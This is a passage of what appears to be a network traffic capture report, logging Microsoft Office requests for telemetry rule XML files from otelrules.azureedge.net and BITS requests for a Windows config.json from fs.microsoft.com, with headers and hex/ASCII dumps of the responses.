                                                                                                                                                                                                                      x-ms-request-id: d7880247-601e-0070-328c-3aa0c9000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164159Z-1777c6cb754gc8g6hC1TEB966c00000009vg00000000cm3g
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:41:59 UTC405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5e 5b 58 78 5d 5b 45 65 5d 5b 4e 6e 5d 24 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120677" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <SR T="2" R="(^[Xx][Ee][Nn]$)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      82192.168.2.74980313.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:41:58 UTC192OUTGET /rules/rule120676v0s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:41:59 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:41:59 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 472
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582B984BF177"
                                                                                                                                                                                                                      x-ms-request-id: cb785bac-301e-0000-6c8c-3aeecc000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164159Z-r1d97b995774n5h6hC1TEBvf84000000096g00000000080q
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:41:59 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120676" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      83192.168.2.74980113.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:41:58 UTC192OUTGET /rules/rule120675v0s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:41:59 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:41:59 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 419
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582BA6CF78C8"
                                                                                                                                                                                                                      x-ms-request-id: 38897bff-401e-000a-368c-3a4a7b000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164159Z-185f5d8b95cf7qddhC1NYC66an0000000ae00000000139cw
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:41:59 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 55 75 5d 5b 50 70 5d 5b 43 63 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 55 75 5d 5b 44 64 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120675" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <SR T="2" R="([Uu][Pp][Cc][Ll][Oo][Uu][Dd])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      84192.168.2.74980413.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:41:59 UTC192OUTGET /rules/rule120678v0s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:41:59 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:41:59 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 468
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582BBA642BF4"
                                                                                                                                                                                                                      x-ms-request-id: 26217b89-b01e-001e-808c-3a0214000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164159Z-185f5d8b95c95vpshC1NYC759c0000000agg00000000cb96
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:41:59 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120678" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      85192.168.2.7498122.18.84.141443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:42:00 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                                                                                      User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                                                      Host: fs.microsoft.com
                                                                                                                                                                                                                      2024-11-20 16:42:01 UTC464INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                                                                      ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                                                      Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                      Server: ECAcc (lpl/EF4C)
                                                                                                                                                                                                                      X-CID: 11
                                                                                                                                                                                                                      X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                                                                                      X-Ms-Region: prod-weu-z1
                                                                                                                                                                                                                      Cache-Control: public, max-age=239
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:42:01 GMT
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      X-CID: 2


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      86192.168.2.74980513.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:42:01 UTC192OUTGET /rules/rule120679v0s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:42:01 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:42:01 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 174
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582B91D80E15"
                                                                                                                                                                                                                      x-ms-request-id: 5a5a0c5e-c01e-0079-588c-3ae51a000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164201Z-1777c6cb754g9zd5hC1TEBfvpw00000009zg00000000f7ez
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:42:01 UTC174INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120679" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> </S> <T> <S T="1" /> </T></R>


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      87192.168.2.74980913.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:42:01 UTC192OUTGET /rules/rule120680v0s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:42:01 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:42:01 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 1952
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582B956B0F3D"
                                                                                                                                                                                                                      x-ms-request-id: 8e68b69a-701e-005c-5c8c-3abb94000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164201Z-185f5d8b95c96jn4hC1NYCbgp80000000agg00000000ceew
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:42:01 UTC1952INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 31 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120680" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <SS T="1" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> <R T="2" R="120682" /> <F T="3"> <O T="LT"> <L>


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      88192.168.2.74981013.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:42:01 UTC192OUTGET /rules/rule120681v0s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:42:03 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:42:03 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 958
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:58 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582BA0A31B3B"
                                                                                                                                                                                                                      x-ms-request-id: 47e3bf54-c01e-0082-038c-3aaf72000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164201Z-185f5d8b95c95vpshC1NYC759c0000000agg00000000cbd4
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:42:03 UTC958INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120681" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120608" /> <R T="2" R="120680" /> <TH T="3"> <O T="AND"> <L> <O T="EQ"> <L>


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      89192.168.2.74981113.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:42:01 UTC192OUTGET /rules/rule120682v0s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:42:01 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:42:01 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 501
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:18 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582BACFDAACD"
                                                                                                                                                                                                                      x-ms-request-id: 733c6689-901e-007b-288c-3aac50000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164201Z-185f5d8b95cdcwrthC1NYCy5b80000000ab0000000010yac
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:42:01 UTC501INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 74 61 72 74 75 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120682" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <R T="2" R="120100" /> <SS T="3" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> </S> <C T="


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      90192.168.2.74981313.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:42:01 UTC193OUTGET /rules/rule120602v10s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:42:02 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:42:01 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 2592
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582BB5B890DB"
                                                                                                                                                                                                                      x-ms-request-id: 85babd8c-f01e-003f-4e8c-3ad19d000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164201Z-185f5d8b95cx9g8lhC1NYCtgvc00000002ug00000000mbfz
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:42:02 UTC2592INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 32 22 20 56 3d 22 31 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 6e 64 4c 61 6e 67 75 61 67 65 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120602" V="10" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAndLanguage" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa=


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      91192.168.2.7498142.18.84.141443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:42:03 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                                                                                      If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                      Range: bytes=0-2147483646
                                                                                                                                                                                                                      User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                                                      Host: fs.microsoft.com
                                                                                                                                                                                                                      2024-11-20 16:42:03 UTC512INHTTP/1.1 200 OK
                                                                                                                                                                                                                      ApiVersion: Distribute 1.1
                                                                                                                                                                                                                      Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                                                                      ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                                                      Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                      Server: ECAcc (lpl/EF06)
                                                                                                                                                                                                                      X-CID: 11
                                                                                                                                                                                                                      X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                                                                                      X-Ms-Region: prod-weu-z1
